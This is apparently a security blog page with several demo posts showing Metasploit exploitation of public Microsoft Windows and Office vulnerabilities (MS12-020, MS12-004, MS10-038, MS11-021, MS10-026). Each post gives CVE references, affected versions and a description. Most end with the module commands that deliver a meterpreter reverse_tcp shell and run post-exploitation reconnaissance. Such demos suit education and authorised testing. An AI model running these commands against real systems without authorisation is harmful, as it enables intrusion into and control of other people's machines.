aka wow on ZATAZ.com
Posts tagged Microsoft
MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo
01 month ago
in Exploits, Metasploit
Timeline :
Vulnerability found by Luigi Auriemma the 2011-05-16
Vulnerability reported by Luigi Auriemma to ZDI
Vulnerability reported to the vendor by ZDI the 2011-08-24
Coordinated public release of the vulnerability the 2012-03-13
Details of the vulnerability published by Luigi Auriemma the 2012-05-16
Metasploit PoC provided the 2012-03-19
PoC provided by :
Luigi Auriemma
Daniel Godas-Lopez
Alex Ionescu
jduck
Reference(s) :
CVE-2012-0002
MS12-020
ZDI-12-044
OSVDB-80004
Affected version(s) :
Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 32 SP2
Windows Server 2008 x64 SP2
Windows 7 for 32 and Windows 7 32 SP1
Windows 7 for x64 and Windows 7 for x64 SP1
Windows Server 2008 R2 x64 and Windows Server 2008 R2 x64 SP1
Tested on Windows XP Pro SP3
Description :
This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.
Commands :
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids SET RHOST 192.168.178.22 exploit
MS12-004 Windows Media Remote Code Execution Metasploit Demo
03 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability the 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided the 2012-01-27
PoC provided by :
Shane Garrett
juan vazquez
sinn3r
Reference(s) :
MS12-004
CVE-2012-0003
OSVDB-78210
Affected version(s) :
Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1
Tested on Windows XP SP3 with :
winmm.dll 5.1.2600.5512
Description :
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
Commands :
use exploit/windows/browser/ms12_004_midi set SRVHOST 192.168.178.100 SET PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid
MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo
05 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered and reported to vendor by Nicolas Joly
Coordinated release of the vulnerability the 2010-06-08
First exploit provided by abysssec the 2010-09-24
Metasploit PoC provided the 2011-11-21
PoC provided by :
Nicolas Joly
Shahin Ramezany
juan vazquez
Reference(s) :
CVE-2010-0822
OSVDB-65236
MS10-038
MOAUB #24
EBD-ID-15094
Affected version(s) :
Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 2
Tested on Windows XP Pro SP3 with :
Microsoft Excel 2002 (10.2614.2625) SP0
Description :
This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the execution flow. This results arbitrary code execution under the context of the user.
Commands :
use exploit/windows/fileformat/ms10_038_excel_obj_bof set TARGET 0 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit -j getuid sysinfo
MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo
16 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered and reported to ZDI by Aniway
Vulnerability reported to vendor by ZDI the 2010-10-18
Coordinated release of the vulnerability the 2011-04-12
Metasploit PoC provided the 2011-11-05
PoC provided by :
Aniway
abysssec
sinn3r
juan vazquez
Reference(s) :
CVE-2011-0105
MS11-021
ZDI-11-121
Affected version(s) :
Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32 and 64 bits edition)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2
Tested on Windows XP Pro SP3 with :
Microsoft Office Excel 2007 (12.0.4518.014)
Description :
This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results arbitrary code execution under the context of user the user.
Commands :
use exploit/windows/fileformat/ms11_021_xlb_bof set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 getuid sysinfo
MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo
09 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability the 2010-04-13
Metasploit PoC provided the 2011-08-12
PoC provided by :
Yamata Li
Shahin Ramezany
juan vazquez
Jordi Sanchez
Reference(s) :
CVE-2010-0480
OSVDB-63749
MS10-026 (KB977816)
Affected version(s) :
Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Tested on Windows XP SP3 with :
Internet Explorer 6
Description :
This module exploits a buffer overlow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0′s so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control.
Commands :
use exploit/windows/browser/ms10_026_avi_nsamplespersec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
getuid
sysinfo
ipconfig
Recent Comments